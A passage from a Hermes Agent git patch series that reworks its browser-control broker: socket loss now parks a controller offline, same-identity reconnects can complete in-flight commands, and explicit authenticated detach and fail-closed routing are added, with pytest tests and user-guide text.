tool_call_id and not pending.done ): @@ -550,24 +698,37 @@ class BrowserControlBroker: del self._pending[pending.command_id] pending.event.set() + @staticmethod + def _cancel_frame(pending: _PendingCommand) -> dict: + return { + "method": FRAME_CANCEL, + "params": { + "command_id": pending.command_id, + "tool_call_id": pending.tool_call_id, + }, + } + + def _defer_cancel_locked( + self, + controller: _Controller, + pending: _PendingCommand, + ) -> None: + controller.deferred_cancels.append(self._cancel_frame(pending)) + if len(controller.deferred_cancels) > MAX_DEFERRED_CANCELS: + del controller.deferred_cancels[:-MAX_DEFERRED_CANCELS] + def _pending_for_scope_locked(self, scope: ControllerScope) -> list[_PendingCommand]: return [ pending for pending in list(self._pending.values()) - if pending.scope == scope + if _same_scope_identity(pending.scope, scope) ] def _emit_cancel_frames( self, controller: _Controller, pendings: list[_PendingCommand] ) -> None: for pending in pendings: - frame = { - "method": FRAME_CANCEL, - "params": { - "command_id": pending.command_id, - "tool_call_id": pending.tool_call_id, - }, - } + frame = self._cancel_frame(pending) try: controller.send(frame) except Exception: @@ -605,13 +766,26 @@ class BrowserControlBroker: ] return matches[0] if len(matches) == 1 else None - def detach_owner(self, owner: Any, *, notify_controller: bool = True) -> int: - """Detach every controller owned by one transport connection.""" + def disconnect_owner(self, owner: Any) -> int: + """Mark every controller owned by one lost transport offline.""" with self._lock: scopes = [ scope for scope, controller in self._controllers.items() - if controller.owner == owner + if controller.owner is owner + ] + disconnected = 0 + for scope in scopes: + disconnected += int(self.disconnect(scope, owner=owner)) + return disconnected + + def detach_owner(self, owner: Any, *, notify_controller: bool = True) -> int: + """Hard-detach every controller owned by one transport connection.""" + with self._lock: + scopes = [ + scope + for scope, controller in self._controllers.items() + if controller.owner is owner ] for scope in scopes: self.detach( diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index feed75afc5..b0e9ce8714 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -41,6 +41,7 @@ Requires: """ import asyncio +import concurrent.futures import errno import hashlib import hmac @@ -144,6 +145,42 @@ def _get_scoped_secret(name, default=None): logger = logging.getLogger(__name__) +def _browser_controller_ws_sender(ws, loop, *, wait_timeout: float = 10.0): + """Return a loop-aware broker sender for one aiohttp controller socket. + + A wait timeout means the coroutine is still in flight on a live loop, not + that the frame was rejected. Keep the broker command pending and let its + own deadline/cancel path decide; a real send exception still propagates. + """ + + def send(frame: dict) -> None: + if ws.closed: + raise ConnectionError("browser-control websocket is closed") + try: + on_loop = asyncio.get_running_loop() is loop + except RuntimeError: + on_loop = False + if on_loop: + loop.create_task(ws.send_json(frame)) + return + future = asyncio.run_coroutine_threadsafe(ws.send_json(frame), loop) + try: + future.result(timeout=wait_timeout) + except concurrent.futures.TimeoutError: + if future.done(): + raise + + def observe_late_send(completed): + try: + completed.result() + except Exception: + logger.exception("browser-controller websocket send failed after wait timeout") + + future.add_done_callback(observe_late_send) + + return send + + def _hermes_version() -> str: """Return the canonical Hermes Agent version string. @@ -3495,26 +3532,7 @@ class APIServerAdapter(BasePlatformAdapter): ) await ws.prepare(request) loop = asyncio.get_running_loop() - - def _send(frame: dict) -> None: - """Broker send callback: forward a frame onto the aiohttp loop. - - Called from broker dispatch threads; aiohttp socket writes must - happen on the event loop. Waiting for the write here preserves - command ordering and lets a closed socket fail the dispatch - instead of silently dropping the frame. - """ - if ws.closed: - raise ConnectionError("browser-control websocket is closed") - try: - on_loop = asyncio.get_running_loop() is loop - except RuntimeError: - on_loop = False - if on_loop: - loop.create_task(ws.send_json(frame)) - return - future = asyncio.run_coroutine_threadsafe(ws.send_json(frame), loop) - future.result(timeout=10.0) + _send = _browser_controller_ws_sender(ws, loop) self._browser_control_broker.attach(scope, _send, owner=ws) try: @@ -3525,25 +3543,36 @@ class APIServerAdapter(BasePlatformAdapter): except Exception: continue if isinstance(frame, dict): - reply = self._handle_browser_control_frame(scope, frame) + reply = self._handle_browser_control_frame( + scope, + frame, + owner=ws, + ) if isinstance(reply, dict): await ws.send_json(reply) elif msg.type in (web.WSMsgType.CLOSE, web.WSMsgType.ERROR): break finally: - self._browser_control_broker.detach( + self._browser_control_broker.disconnect( scope, owner=ws, - notify_controller=False, ) return ws - def _handle_browser_control_frame(self, scope: "ControllerScope", frame: dict) -> None: + def _handle_browser_control_frame( + self, + scope: "ControllerScope", + frame: dict, + *, + owner: Any = None, + ) -> None: """Apply one controller→broker frame with exact-scope checks.""" method = frame.get("method") params = frame.get("params") if not isinstance(params, dict): return + if owner is None or not self._browser_control_broker.is_owner(scope, owner): + return if method == "browser.controller.heartbeat": nonce = str(params.get("nonce") or "").strip() if not nonce or len(nonce) > 128: @@ -3555,6 +3584,16 @@ class APIServerAdapter(BasePlatformAdapter): "method": "browser.controller.heartbeat", "params": {"nonce": nonce, "ok": True}, } + if method == "browser.controller.detach": + self._browser_control_broker.detach( + scope, + owner=owner, + notify_controller=False, + ) + return { + "method": "browser.controller.detach", + "params": {"ok": True}, + } if method == "browser.controller.result": command_id = params.get("command_id") if isinstance(command_id, str) and command_id: diff --git a/tests/gateway/test_browser_control_api.py b/tests/gateway/test_browser_control_api.py index cf70cb92fe..d19735242c 100644 --- a/tests/gateway/test_browser_control_api.py +++ b/tests/gateway/test_browser_control_api.py @@ -1,13 +1,21 @@ import asyncio +import concurrent.futures import time import pytest from aiohttp import WSServerHandshakeError, web from aiohttp.test_utils import TestClient, TestServer -from gateway.browser_control_broker import ControllerRejected, ControllerScope +from gateway.browser_control_broker import ( + ControllerCancelled, + ControllerRejected, + ControllerScope, +) from gateway.config import PlatformConfig -from gateway.platforms.api_server import APIServerAdapter +from gateway.platforms.api_server import ( + APIServerAdapter, + _browser_controller_ws_sender, +) from tools.browser_extension_router import route_browser_tool @@ -148,6 +156,65 @@ def test_route_table_advertises_registration_and_controller_ws_without_replacing assert ("POST", "/v1/chat/completions") in routes +def test_ws_sender_treats_wait_timeout_as_in_flight_and_real_error_as_failure(monkeypatch): + class WS: + closed = False + + async def send_json(self, _frame): + return None + + class Future: + def __init__(self, error, *, done=False): + self.error = error + self._done = done + self.callbacks = [] + + def result(self, timeout=None): + if self.error is not None: + raise self.error + return None + + def add_done_callback(self, callback): + self.callbacks.append(callback) + + def done(self): + return self._done + + timeout_future = Future(concurrent.futures.TimeoutError()) + def return_timeout(coro, _loop): + coro.close() + return timeout_future + + monkeypatch.setattr(asyncio, "run_coroutine_threadsafe", return_timeout) + sender = _browser_controller_ws_sender(WS(), object(), wait_timeout=0.01) + sender({"method": "browser.controller.command"}) + assert len(timeout_future.callbacks) == 1 + + error_future = Future(ConnectionError("socket write failed")) + def return_error(coro, _loop): + coro.close() + return error_future + + monkeypatch.setattr(asyncio, "run_coroutine_threadsafe", return_error) + sender = _browser_controller_ws_sender(WS(), object(), wait_timeout=0.01) + with pytest.raises(ConnectionError, match="socket write failed"): + sender({"method": "browser.controller.command"}) + + completed_timeout = Future(concurrent.futures.TimeoutError(), done=True) + def return_completed_timeout(coro, _loop): + coro.close() + return completed_timeout + + monkeypatch.setattr( + asyncio, + "run_coroutine_threadsafe", + return_completed_timeout, + ) + sender = _browser_controller_ws_sender(WS(), object(), wait_timeout=0.01) + with pytest.raises(concurrent.futures.TimeoutError): + sender({"method": "browser.controller.command"}) + + def test_api_agent_context_binds_server_principal_and_transport_family(): from gateway.session_context import clear_session_vars, get_session_env @@ -472,6 +539,129 @@ async def test_real_browser_action_routes_through_controller_without_legacy_fall await ws.close() +@pytest.mark.asyncio +async def test_local_api_same_identity_reconnect_completes_command_started_on_old_socket(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + first_response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=["browser_snapshot"]), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + first = await first_response.json() + first_ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(first["ticket"])], + ) + + pending = asyncio.create_task( + asyncio.to_thread( + route_browser_tool, + "browser_snapshot", + {}, + fallback=lambda: "legacy-result", + broker=adapter._browser_control_broker, + enabled=True, + session_id="session-fixture", + principal_id=first["scope"]["principal_id"], + transport_family="local-api", + tool_call_id="tool-call-reconnect", + ) + ) + command = await first_ws.receive_json(timeout=2.0) + await first_ws.close() + await asyncio.sleep(0) + assert not pending.done() + + second_response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=["browser_snapshot"]), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + second = await second_response.json() + second_ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(second["ticket"])], + ) + await second_ws.send_json( + { + "method": "browser.controller.result", + "params": { + "command_id": command["params"]["command_id"], + "ok": True, + "result": {"reconnected": True}, + }, + } + ) + assert await asyncio.wait_for(pending, timeout=2.0) == '{"reconnected": true}' + await second_ws.close() + + +@pytest.mark.asyncio +async def test_local_api_explicit_detach_is_hard_and_stale_socket_cannot_detach_refresh(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + first_response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=["controller.noop"]), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + first = await first_response.json() + first_ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(first["ticket"])], + ) + second_response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=["controller.noop"]), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + second = await second_response.json() + second_ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(second["ticket"])], + ) + + await first_ws.send_json( + {"method": "browser.controller.detach", "params": {}} + ) + with pytest.raises(asyncio.TimeoutError): + await first_ws.receive_json(timeout=0.05) + + pending = asyncio.create_task( + asyncio.to_thread( + adapter._browser_control_broker.dispatch, + ControllerScope( + principal_id=second["scope"]["principal_id"], + profile_id=second["scope"]["profile_id"], + session_id=second["scope"]["session_id"], + controller_id=second["scope"]["controller_id"], + browser_profile_id=second["scope"]["browser_profile_id"], + transport_family=second["scope"]["transport_family"], + capabilities=frozenset(second["scope"]["capabilities"]), + ), + action="controller.noop", + tool_call_id="tool-call-explicit-detach", + ) + ) + command = await second_ws.receive_json(timeout=2.0) + await second_ws.send_json( + {"method": "browser.controller.detach", "params": {}} + ) + detached = await second_ws.receive_json(timeout=2.0) + assert detached == { + "method": "browser.controller.detach", + "params": {"ok": True}, + } + with pytest.raises(ControllerCancelled): + await asyncio.wait_for(pending, timeout=2.0) + assert command["method"] == "browser.controller.command" + await first_ws.close() + await second_ws.close() + + @pytest.mark.asyncio async def test_remote_api_uses_the_same_authenticated_noop_round_trip(monkeypatch): adapter = _adapter() diff --git a/tests/gateway/test_browser_control_broker_hardening.py b/tests/gateway/test_browser_control_broker_hardening.py index b78aec407b..912ebb1d3c 100644 --- a/tests/gateway/test_browser_control_broker_hardening.py +++ b/tests/gateway/test_browser_control_broker_hardening.py @@ -131,21 +131,254 @@ def test_completion_requires_the_same_scope_as_the_pending_command(): assert broker.pending_count == 0 -def test_reattach_cancels_pending_work_from_the_previous_controller_generation(): +def test_same_identity_reattach_preserves_pending_work_and_completes_on_new_owner(): broker = BrowserControlBroker(command_timeout=1.0) scope = _scope() thread, outcome, frames = _start_pending(broker, scope) - old_command_id = frames[0]["params"]["command_id"] + command_id = frames[0]["params"]["command_id"] + replacement_frames = [] - broker.attach(scope, lambda _frame: None, owner="replacement-owner") + broker.attach(scope, replacement_frames.append, owner="replacement-owner") + assert thread.is_alive() + assert broker.pending_count == 1 + assert broker.complete( + command_id, + scope=scope, + ok=True, + result={"reconnected": True}, + ) is True thread.join(timeout=1.0) assert not thread.is_alive() + assert outcome.get("result") == {"reconnected": True} + assert "error" not in outcome + assert replacement_frames == [] + + +def test_same_stable_identity_can_renegotiate_capabilities_without_ambiguity(): + broker = BrowserControlBroker(command_timeout=1.0) + original = _scope() + thread, outcome, frames = _start_pending(broker, original) + command_id = frames[0]["params"]["command_id"] + refreshed = _scope(capabilities=frozenset({"controller.noop", "browser_snapshot"})) + + broker.attach(refreshed, lambda _frame: None, owner="replacement-owner") + + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="local-api", + ) == refreshed + assert broker.complete( + command_id, + scope=refreshed, + ok=True, + result={"capabilities": "refreshed"}, + ) is True + thread.join(timeout=1.0) + assert outcome.get("result") == {"capabilities": "refreshed"} + + +def test_transport_disconnect_parks_pending_and_reconnect_completes_it(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + command_id = frames[0]["params"]["command_id"] + + assert broker.disconnect_owner("owner-fixture") == 1 + assert thread.is_alive() + assert broker.pending_count == 1 + assert broker.select(scope, "controller.noop") is None + with pytest.raises(ControllerUnavailable): + broker.dispatch(scope, action="controller.noop") + + broker.attach(scope, lambda _frame: None, owner="replacement-owner") + assert broker.complete( + command_id, + scope=scope, + ok=True, + result={"after": "reconnect"}, + ) is True + thread.join(timeout=1.0) + assert outcome.get("result") == {"after": "reconnect"} + + +def test_timeout_while_disconnected_flushes_cancel_before_new_dispatch(): + broker = BrowserControlBroker(command_timeout=0.02) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + command_id = frames[0]["params"]["command_id"] + + assert broker.disconnect_owner("owner-fixture") == 1 + thread.join(timeout=1.0) + assert isinstance(outcome.get("error"), ControllerTimeout) + assert broker.pending_count == 0 + + replacement_frames = [] + broker.attach(scope, replacement_frames.append, owner="replacement-owner") + assert replacement_frames == [ + { + "method": "browser.controller.cancel", + "params": { + "command_id": command_id, + "tool_call_id": "tool-call-fixture", + }, + } + ] + + second = {} + + def run_second(): + try: + second["result"] = broker.dispatch( + scope, + action="controller.noop", + tool_call_id="tool-call-second", + ) + except Exception as exc: + second["error"] = exc + + second_thread = threading.Thread(target=run_second) + second_thread.start() + while len(replacement_frames) < 2: + second_thread.join(timeout=0.01) + assert replacement_frames[1]["method"] == "browser.controller.command" + assert broker.complete( + replacement_frames[1]["params"]["command_id"], + scope=scope, + ok=True, + result={"second": True}, + ) is True + second_thread.join(timeout=1.0) + assert second.get("result") == {"second": True} + + +def test_old_transport_owner_cannot_complete_after_same_identity_reconnect(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + command_id = frames[0]["params"]["command_id"] + refreshed_scope = _scope(capabilities=frozenset({"controller.noop", "browser_snapshot"})) + + broker.attach(refreshed_scope, lambda _frame: None, owner="replacement-owner") + + assert broker.is_owner(refreshed_scope, "owner-fixture") is False + assert broker.is_owner(refreshed_scope, "replacement-owner") is True + assert broker.complete( + command_id, + scope=scope, + ok=True, + result={"stale": True}, + ) is False + assert broker.complete( + command_id, + scope=refreshed_scope, + ok=True, + result={"fresh": True}, + ) is True + thread.join(timeout=1.0) + assert outcome.get("result") == {"fresh": True} + + +def test_cancel_with_pre_reconnect_scope_still_cancels_same_stable_identity(): + broker = BrowserControlBroker(command_timeout=1.0) + original = _scope() + thread, outcome, frames = _start_pending( + broker, + original, + tool_call_id="tool-call-before-reconnect", + ) + refreshed = _scope(capabilities=frozenset({"controller.noop", "browser_snapshot"})) + refreshed_frames = [] + broker.attach(refreshed, refreshed_frames.append, owner="replacement-owner") + + assert broker.cancel( + original, + tool_call_id="tool-call-before-reconnect", + ) is True + thread.join(timeout=1.0) assert isinstance(outcome.get("error"), ControllerCancelled) - assert broker.complete(old_command_id, scope=scope, ok=True, result={}) is False + assert refreshed_frames == [ + { + "method": "browser.controller.cancel", + "params": { + "command_id": frames[0]["params"]["command_id"], + "tool_call_id": "tool-call-before-reconnect", + }, + } + ] -def test_session_lookup_fails_closed_on_ambiguity_and_owner_detach_is_scoped(): +def test_different_stable_identity_hard_replaces_and_cancels_pending_work(): + broker = BrowserControlBroker(command_timeout=1.0) + original = _scope() + thread, outcome, frames = _start_pending(broker, original) + command_id = frames[0]["params"]["command_id"] + replacement = _scope(controller_id="different-controller") + + broker.attach(replacement, lambda _frame: None, owner="replacement-owner") + + assert broker.complete( + command_id, + scope=replacement, + ok=True, + result={"unsafe": True}, + ) is False + assert broker.complete( + command_id, + scope=original, + ok=True, + result={"original": True}, + ) is False + thread.join(timeout=1.0) + assert isinstance(outcome.get("error"), ControllerCancelled) + + +def test_different_controller_identity_hard_replaces_parked_session_controller(): + broker = BrowserControlBroker(command_timeout=1.0) + original = _scope() + thread, outcome, _frames = _start_pending(broker, original) + assert broker.disconnect_owner("owner-fixture") == 1 + + replacement = ControllerScope( + principal_id=original.principal_id, + profile_id=original.profile_id, + session_id=original.session_id, + controller_id="replacement-controller", + browser_profile_id=original.browser_profile_id, + transport_family=original.transport_family, + capabilities=original.capabilities, + ) + broker.attach(replacement, lambda _frame: None, owner="replacement-owner") + + thread.join(timeout=1.0) + assert isinstance(outcome.get("error"), ControllerCancelled) + assert broker.scope_for_session( + session_id=original.session_id, + principal_id=original.principal_id, + transport_family=original.transport_family, + ) == replacement + assert broker.select(original, "controller.noop") is None + assert broker.select(replacement, "controller.noop") is not None + + +def test_failed_deferred_cancel_flush_keeps_controller_offline(): + broker = BrowserControlBroker(command_timeout=0.01) + scope = _scope() + thread, outcome, _frames = _start_pending(broker, scope) + assert broker.disconnect_owner("owner-fixture") == 1 + thread.join(timeout=1.0) + assert isinstance(outcome.get("error"), ControllerTimeout) + + def fail_send(_frame): + raise ConnectionError("fixture flush failed") + + with pytest.raises(ConnectionError, match="flush"): + broker.attach(scope, fail_send, owner="replacement-owner") + assert broker.select(scope, "controller.noop") is None + + +def test_session_lane_replacement_and_owner_detach_are_scoped(): broker = BrowserControlBroker() first = _scope(controller_id="controller-one") second = _scope(controller_id="controller-two") @@ -162,14 +395,19 @@ def test_session_lookup_fails_closed_on_ambiguity_and_owner_detach_is_scoped(): session_id="session-fixture", principal_id="principal-fixture", transport_family="local-api", - ) is None + ) == second assert broker.scope_for_session( session_id="other-session", principal_id="principal-fixture", transport_family="cloud-ticket-ws", ) == other - assert broker.detach_owner("owner-shared") == 2 + assert broker.detach_owner("owner-shared") == 1 + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="local-api", + ) is None assert broker.scope_for_session( session_id="other-session", principal_id="principal-fixture", diff --git a/tests/gateway/test_browser_control_cloud.py b/tests/gateway/test_browser_control_cloud.py index 3b2561551d..c92235a457 100644 --- a/tests/gateway/test_browser_control_cloud.py +++ b/tests/gateway/test_browser_control_cloud.py @@ -400,3 +400,189 @@ def test_cloud_gateway_real_action_round_trip_is_bound_to_identity_and_transport finally: broker.reset() server._sessions.pop("session-fixture", None) + + +def test_cloud_same_identity_reconnect_refreshes_transport_and_completes_pending(monkeypatch): + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", lambda: True + ) + broker = get_browser_control_broker() + broker.reset() + ready = threading.Event() + first_frames = [] + second_frames = [] + + class Transport: + auth_identity = { + "user_id": "reconnect-user", + "provider": "provider-fixture", + } + + def __init__(self, frames): + self.frames = frames + + def write(self, frame): + self.frames.append(frame) + if frame.get("method") == "event": + ready.set() + return True + + first = Transport(first_frames) + second = Transport(second_frames) + session = { + "transport": first, + "session_key": "stored-reconnect-session", + "profile": "default", + } + server._sessions["reconnect-session"] = session + try: + first_registration = server.dispatch( + { + "jsonrpc": "2.0", + "id": 1, + "method": "browser.controller.register", + "params": { + "protocol_version": 1, + "session_id": "reconnect-session", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "capabilities": ["browser_navigate"], + }, + }, + first, + ) + scope_payload = first_registration["result"]["scope"] + scope = broker.scope_for_session( + session_id="reconnect-session", + principal_id=scope_payload["principal_id"], + transport_family="cloud-ticket-ws", + ) + outcome = {} + + def dispatch(): + outcome["result"] = broker.dispatch( + scope, + action="browser_navigate", + arguments={"url": "https://example.test"}, + tool_call_id="tool-call-reconnect", + ) + + thread = threading.Thread(target=dispatch) + thread.start() + assert ready.wait(timeout=1.0) + command_id = first_frames[-1]["params"]["payload"]["command_id"] + + assert broker.disconnect_owner(first) == 1 + assert thread.is_alive() + session["transport"] = second + second_registration = server.dispatch( + { + "jsonrpc": "2.0", + "id": 2, + "method": "browser.controller.register", + "params": { + "protocol_version": 1, + "session_id": "reconnect-session", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "capabilities": ["browser_navigate", "browser_snapshot"], + }, + }, + second, + ) + assert second_registration["result"]["scope"]["capabilities"] == [ + "browser_navigate", + "browser_snapshot", + ] + result = server.dispatch( + { + "jsonrpc": "2.0", + "id": 3, + "method": "browser.controller.result", + "params": { + "session_id": "reconnect-session", + "command_id": command_id, + "ok": True, + "result": {"reconnected": True}, + }, + }, + second, + ) + assert result["result"]["accepted"] is True + thread.join(timeout=1.0) + assert outcome.get("result") == {"reconnected": True} + finally: + broker.reset() + server._sessions.pop("reconnect-session", None) + + +def test_cloud_explicit_detach_requires_current_authenticated_owner(monkeypatch): + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", lambda: True + ) + broker = get_browser_control_broker() + broker.reset() + + class Transport: + auth_identity = { + "user_id": "detach-user", + "provider": "provider-fixture", + } + + def write(self, _frame): + return True + + owner = Transport() + foreign = Transport() + server._sessions["detach-session"] = { + "transport": owner, + "session_key": "stored-detach-session", + "profile": "default", + } + try: + registration = server.dispatch( + { + "jsonrpc": "2.0", + "id": 1, + "method": "browser.controller.register", + "params": { + "protocol_version": 1, + "session_id": "detach-session", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "capabilities": ["controller.noop"], + }, + }, + owner, + ) + assert "result" in registration + + foreign_result = server.dispatch( + { + "jsonrpc": "2.0", + "id": 2, + "method": "browser.controller.detach", + "params": {"session_id": "detach-session"}, + }, + foreign, + ) + assert foreign_result["error"]["code"] == 4403 + + detached = server.dispatch( + { + "jsonrpc": "2.0", + "id": 3, + "method": "browser.controller.detach", + "params": {"session_id": "detach-session"}, + }, + owner, + ) + assert detached["result"] == {"detached": True} + assert broker.scope_for_session( + session_id="detach-session", + principal_id=registration["result"]["scope"]["principal_id"], + transport_family="cloud-ticket-ws", + ) is None + finally: + broker.reset() + server._sessions.pop("detach-session", None) diff --git a/tests/tools/test_snapshot_session_id_leak.py b/tests/tools/test_snapshot_session_id_leak.py index 39b13a44fc..f2e65c716e 100644 --- a/tests/tools/test_snapshot_session_id_leak.py +++ b/tests/tools/test_snapshot_session_id_leak.py @@ -49,6 +49,7 @@ def test_export_snippet_shape(): assert "unset" in snippet assert "${!HERMES_SESSION_*}" in snippet assert "${!HERMES_CRON_AUTO_DELIVER_*}" in snippet + assert "${!HERMES_BROWSER_CONTROL_*}" in snippet assert "HERMES_UI_SESSION_ID" in snippet assert "grep -vE" not in snippet assert '"$__hermes_snap_tmp"' in snippet diff --git a/tools/environments/base.py b/tools/environments/base.py index dbdb874240..460c5eaee3 100644 --- a/tools/environments/base.py +++ b/tools/environments/base.py @@ -529,7 +529,8 @@ def _cwd_marker(session_id: str) -> str: # as the Python-side contract for the exclusion set; the dump path unsets by # name/prefix instead of grepping declare lines (see below / issue #71296). _SNAPSHOT_EXCLUDED_ENV_REGEX = ( - "^declare -x (HERMES_SESSION_|HERMES_UI_SESSION_ID|HERMES_CRON_AUTO_DELIVER_|HERMES_CRON_SESSION)" + "^declare -x (HERMES_SESSION_|HERMES_UI_SESSION_ID|HERMES_CRON_AUTO_DELIVER_|" + "HERMES_CRON_SESSION|HERMES_BROWSER_CONTROL_)" ) _SHELL_ENV_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$") @@ -573,6 +574,7 @@ def _export_dump_excluding_session_vars( return ( "{ ( " "unset ${!HERMES_SESSION_*} ${!HERMES_CRON_AUTO_DELIVER_*} " + "${!HERMES_BROWSER_CONTROL_*} " # AI_AGENT / HERMES_AGENT are per-command attribution markers # (re-exported by every _wrap_command with outer-harness-preserving # ${VAR:-default} semantics). Persisting them into the snapshot diff --git a/tui_gateway/methods_browser_control.py b/tui_gateway/methods_browser_control.py index 98819a3e2f..65409ee69f 100644 --- a/tui_gateway/methods_browser_control.py +++ b/tui_gateway/methods_browser_control.py @@ -345,6 +345,40 @@ def _( return _ok(rid, {"ok": True}) +@method("browser.controller.detach") +def _( + rid, + params: dict, + _family=_CLOUD_TRANSPORT_FAMILY, + _forbidden=_ERR_FORBIDDEN, + _identity_ok=_is_authenticated_identity, + _digest=_principal_digest, +) -> dict: + """Hard-detach only the controller owned by this authenticated transport.""" + from gateway import browser_control_broker + + transport = current_transport() + identity = getattr(transport, "auth_identity", None) + if not _identity_ok(identity): + return _err(rid, _forbidden, "authenticated controller identity required") + session_id = str(params.get("session_id") or "") + with _sessions_lock: + session = _sessions.get(session_id) + if session is None or session.get("transport") is not transport: + return _err(rid, _forbidden, "session is not owned by this transport") + + broker = browser_control_broker.get_browser_control_broker() + scope = broker.scope_for_session( + session_id=session_id, + principal_id=_digest(identity), + transport_family=_family, + ) + if scope is None or not broker.is_owner(scope, transport): + return _err(rid, _forbidden, "controller is not owned by this transport") + broker.detach(scope, owner=transport, notify_controller=False) + return _ok(rid, {"detached": True}) + + def register(server) -> None: """Bind this module's handlers onto ``server``'s globals and registry.""" _registry.install(server) diff --git a/tui_gateway/ws.py b/tui_gateway/ws.py index 47d0f9b1ef..637b7f9e1f 100644 --- a/tui_gateway/ws.py +++ b/tui_gateway/ws.py @@ -462,20 +462,18 @@ async def handle_ws( if transport is not None: server.unregister_live_transport(transport) - # Owner-safely detach browser controllers this transport - # registered. The socket itself is closing, so no - # peer cancel write is attempted; every server-side pending command - # is still failed closed immediately. + # Owner-safely park browser controllers this transport registered. + # A reconnect with the same stable identity may deliver a terminal + # result for work already in flight; no new dispatch is admitted + # while the controller is offline. try: from gateway.browser_control_broker import ( get_browser_control_broker, ) - get_browser_control_broker().detach_owner( - transport, notify_controller=False - ) + get_browser_control_broker().disconnect_owner(transport) except Exception: - _log.exception("ws browser-controller detach failed peer=%s", peer) + _log.exception("ws browser-controller disconnect failed peer=%s", peer) transport.close() diff --git a/website/docs/user-guide/features/api-server.md b/website/docs/user-guide/features/api-server.md index 66e7f9bc92..18dd5f4e62 100644 --- a/website/docs/user-guide/features/api-server.md +++ b/website/docs/user-guide/features/api-server.md @@ -321,6 +321,18 @@ same `command_id`, an exact boolean `ok`, and either `result` or `error`. Cancellation and timeout emit `browser.controller.cancel`; late results are ignored. +An unexpected socket loss marks the controller offline and preserves work +already in flight until each command's original deadline. A reconnect with the +same principal, profile, session, controller id, browser profile, and transport +identity refreshes the transport without admitting new work before any deferred +cancels are flushed. Negotiated capabilities may change on that reconnect; they +are not an identity field. A different controller id or browser profile in the +same authenticated session lane is a hard replacement: old pending work is +cancelled before the successor becomes routable. Send +`browser.controller.detach` on the authenticated controller transport for an +intentional hard detach — that immediately cancels pending work. Merely closing +the socket is treated as a recoverable disconnect. + The authenticated dashboard transport exposes the same registration, result, heartbeat, capability, and ownership semantics over its Gateway RPC/event channel. In both transports, selection requires one unambiguous exact match on From 2039b572f5ea0cf9cefeeb74a640785e25305f03 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 22:40:53 +0700 Subject: [PATCH 013/161] fix(browser): keep bound controller routing authoritative Generic Hermes callers still use the existing browser backend when extension control is disabled or no server-bound controller identity exists. Once the gateway binds a controller identity, missing scope, disconnect, or capability loss now fail closed instead of silently switching a control-this-tab request to another local or cloud browser. Covers the schema-build to dispatch disconnect race. --- tests/tools/test_browser_extension_router.py | 82 ++++++++++++++++--- tools/browser_extension_router.py | 37 +++++---- .../docs/user-guide/features/api-server.md | 8 ++ 3 files changed, 98 insertions(+), 29 deletions(-) diff --git a/tests/tools/test_browser_extension_router.py b/tests/tools/test_browser_extension_router.py index 9d7d69b1e4..ea796beec7 100644 --- a/tests/tools/test_browser_extension_router.py +++ b/tests/tools/test_browser_extension_router.py @@ -51,23 +51,27 @@ def test_feature_off_calls_existing_backend_once_without_touching_broker(): "scope,selected", [(None, None), ("scope-fixture", None)], ) -def test_no_exact_capable_controller_preserves_existing_backend(scope, selected): +def test_bound_request_without_exact_capable_controller_fails_closed(scope, selected): + from gateway.browser_control_broker import ControllerUnavailable + broker = FakeBroker(scope=scope, selected=selected) fallbacks = [] - result = route_browser_tool( - "browser_navigate", - {"url": "https://example.test"}, - fallback=lambda: fallbacks.append(True) or "legacy-result", - broker=broker, - enabled=True, - session_id="session-fixture", - task_id="task-fixture", - tool_call_id="tool-call-fixture", - ) + with pytest.raises(ControllerUnavailable, match="browser_navigate"): + route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "unsafe-legacy-result", + broker=broker, + enabled=True, + session_id="session-fixture", + task_id="task-fixture", + principal_id="principal-fixture", + transport_family="local-api", + tool_call_id="tool-call-fixture", + ) - assert result == "legacy-result" - assert fallbacks == [True] + assert fallbacks == [] assert not any(call[0] == "dispatch" for call in broker.calls) @@ -267,6 +271,58 @@ def test_extension_availability_requires_exact_scope_and_capability(monkeypatch) ] +def test_bound_controller_disappearing_after_schema_build_never_falls_back(monkeypatch): + from gateway.browser_control_broker import ( + BrowserControlBroker, + ControllerScope, + ControllerUnavailable, + ) + from gateway.session_context import clear_session_vars, set_session_vars + from tools import browser_extension_router + + broker = BrowserControlBroker(command_timeout=0.1) + scope = ControllerScope( + principal_id="principal-fixture", + profile_id="default", + session_id="session-fixture", + 